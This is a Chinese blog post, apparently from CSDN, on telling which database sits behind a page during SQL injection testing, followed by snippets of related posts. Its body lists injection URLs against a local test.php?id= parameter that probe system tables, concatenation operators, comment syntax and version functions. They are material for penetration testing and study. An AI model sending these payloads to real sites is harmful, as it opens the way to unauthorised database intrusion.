mysql 判断类型_SQL注入判断数据库类型

最新推荐文章于 2024-10-31 00:30:00 发布
最新推荐文章于 2024-10-31 00:30:00 发布
阅读量330 收藏 1
点赞数
文章标签: mysql 判断类型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_33803878/article/details/113140031
版权

页面返回的报错信息判断

默认端口判断

Oracle

port:1521

SQL Server

port:1433

MySQL

port:3306

数据库特有的数据表判断

oracle数据库

http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1

mysql数据库(mysql版本在5.0以上)

http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1

access数据库

http://127.0.0.1/test.php?id=1 and (select count(*) from msysobjects)>0 and 1=1

mssql数据库

http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

数据库特有的连接符判断

mysql数据库

http://127.0.0.1/test.php?id=1 and '1' + '1' = '11'

http://127.0.0.1/test.php?id=1 and CONCAT('1','1')='11'

mssql数据库

http://127.0.0.1/test.php?id=1 and '1' + '1' = '11'

oracle数据库

http://127.0.0.1/test.php?id=1 and '1'||'1'='11'

http://127.0.0.1/test.php?id=1 and CONCAT('1','1')='11'

符号判断

mysql数据库:(1)以" /* "开始,以" */ "结束。(2)或者" # "。

Oracle: 支持单行注释" -- "和多行注释" /* */ "

" ; "是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库

特定函数判断

length() lengthb() char_length()

Oracle: length():表示字符串长度 lengthb():表示字符串的字节长度

mysql:length():返回字符串所占的字节数 char_length():返回字符串的字符数

@@version version()

mysql: @@version或是version()来返回当前的版本信息。

但无法判断是mysql还是mssql时,可以用version()函数来构造判断。

version()>1 返回与@@version>1 相同页面时,则可能是mysql。如果出现提示version()错误时,则可能是mssql。

substring substr

在mssql中可以调用substring(), oracle则只可调用substr()

南洋野人
关注
sql注入mysql判断_SQL注入判断数据库类型
weixin_36116139的博客
01-30 2649
SQL注入首先会判断服务端数据库类型,通过已知不同数据库的一些特性,便于后续进一步渗透测试一般来说SQL注入存在的四个语句“SELECT/UPDATE/INSERT/DELETE”,增删改查,通过一些参数带入SQL执行语句中,再通过拼凑等方式获取更多的信息0x00 常见网页类型对应数据库关系asp : Access/SQLServerphp : Mysqljsp : Oracle0x...
SQL注入判断数据库类型
最新发布
w2361734601的博客
03-30 1154
通过结合上述方法,可以快速判断目标数据库类型,从而制定针对性的注入策略。注意实际测试时需谨慎,避免触发安全防护机制。
SQL注入数据库类型判断
weixin_45718516的博客
02-04 1380
SQL注入数据库类型判断 前言 安服小白一枚,第一次发表文章,就当做是自己的笔记,如有错误还请各位大佬多多指教,小白不易,还请哥哥轻喷。 默认端口判断 MySQL:3306 MSSQL:1433 Oracle:1521 当然,除非是在内网做测试,否则一般情况下是不可能把这些端口映射出来的。 数据库特有连接符判断 id=1 and ‘1’+’1’=’11’ #MySQL或者是MSSQL id=1 and concat(‘1’,’1’)=’11’ #MySQL或者Oracle id=1 and ‘1’|
SQL注入数据库判断
ma963852的博客
04-14 4233
01 网站类型数据库的联系 asp:SQLServer,Access .net :SQLServer php:Mysql,PostgreSql java:Oracle,Mysql 可以根据网站类型来大概确定后续测试数据库的优先级。 02 依据主机端口 如果可以对主机进行端口扫描,可以根据是否开启对应端口,来大概判断数据库类型。 Oracle 默认端口号:1521 SQL Server 默认端口号:1433 MySQL 默认端口号:3306 PostgreSql 默认端口号:54..
SQL注入如何判断数据库类型
热门推荐
weixin_43749601的博客
04-01 1万+
前言 在进行SQL注入之前,首先应该判断数据库类型,不同的数据库在处理一些函数的时候会有一些微妙的差别,只有判断出是哪种数据库类型,这样才能根据数据库类型选择合适的函数,更容易实现SQL注入。 前端与数据库类型 asp:SQL Server,Access .net:SQL Server php:MySQL,PostgreSQL java:Oracle,MySQL 根据端口判断 Oracle:默认端口1521 SQL Server:默认端口1433 MySQL:默认端口3306 根据数据库特有函数来判断
MySQL数据库SQL注入漏洞解析
CoffeMilk的博客
09-07 1469
SQL注入总结起来就是:没有对用户输入提交的数据内容的合法性进行严格的判断或过滤,就直接将这些伪造的数据内容带入到数据库执行,导致数据泄露或损坏,甚至导致完全接管主机的一种安全漏洞。
xxx.rar_injection xxx_injectionxxx_injection视频xxx_sql_sql注入文档
09-20
接下来,文档可能会涉及几种常见的SQL注入类型,如错误注入、时间盲注、联合查询注入等。错误注入是通过触发数据库错误来获取信息,时间盲注则是在查询执行时间上做文章,通过观察响应时间来获取数据。联合查询注入...
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1447
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
SQL.rar_labview mysql_mysql labview_sql
09-21
标题“SQL.rar_labview mysql_mysql labview_sql”和描述“在labview中实现数据库MySQL调用的节点函数...在实际项目中,确保遵循最佳实践,如使用预编译的SQL语句防止SQL注入,以及适时关闭数据库连接以优化资源利用。
SQL注入中如何判断数据库类型
weixin_52967270的博客
10-31 1203
的错误信息通常包含“syntax error”或“you have an error in your SQL syntax”。的错误信息可能包含“incorrect syntax near”或“unclosed quotation mark”。的错误信息通常包含“ERROR: syntax error at or near”。常用端口号,实战中使用,端口号可能会被被修改被隐藏。的错误信息可能包含“ORA-”开头的错误代码。使用浏览器插件,或扫描器,进行指纹识别。sqlmap -u ‘注入点网址’
SQL注入手工检测sql注入检测
04-21
sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测
sql注入mysql判断_SQL注入通过函数来判断数据库类型
weixin_33733806的博客
01-19 344
SQL注入通过函数来判断数据库类型某日,发现一目标存在SQL注入,且过滤了select等相关敏感字段,用工具暂无法判断数据库类型。后发现调用某些SQL函数也可判断数据库类型,虽然SQL语句大部分是通用的。但一些内置的函数还是有一定的区别。len和length在mssqlmysql以及db2内,返回长度值是调用len()函数;在oracle和INFORMIX则是通过length()来返回长度值。换...
注入判断mysql数据库_注入判断数据库类型
weixin_42282699的博客
02-12 393
SQL注入-数据库判断国内的网站用ASP+Access或SQLServer的占70%以上,PHP+MySQL占20%,其他的不足10%。常见的数据库Oracle、MySQLSQL Server、Access、MSsql、mongodb等关系型数据库通过外键关联来建立表与表之间的关系,非关系型数据库通常指数据以对象的形式存储在数据库中,而对象之间的关系通过每个对象自身的属性来决定.关系型数据库:由...
mysql数据类型判断
RENYUAN
07-31 4338
例:if mySQLQuery1.FieldDefs.Items[i].DataType = ftMemo then ....... 全部类型如下:const  TypeSizes: packed array[TFieldType] of Byte =    (0 {ftUnknown}, 20 {ftString}, 0 {ftSmallint}, 0 {ftInteger}, 0
利用 SQL 注入识别数据库方法总结
Flag少侠的博客
04-07 1691
识别数据库的最好方法在很大程度上取决于是否处于盲态。如果应用程序返回(至少在某种程度上)查询结果和(或)数据库服务器错误消息(例如,非盲态),那么跟踪会相当简单,因为可以很容易通过产生的输出结果来提供关于底层技术的信息。但如果处于盲态,无法让应用返回数据库服务器消息,那么就需要改变方法,尝试注入多种已知的、只针对特定技术才能执行的查询。通过判断这些查询中的哪一条被成功执行,获取目前面对的数据库服务器的精确信息。
SQL注入数据库判断
孤的博客
04-03 3849
方法一: 用@@datadir查看数据库安装目录,能否判断出 方法二: 通过各个数据库特有的数据表来判断 1、mssql数据库 http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1 2、access数据库 http://127.0.0.1/test.php?id=1 and (s...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值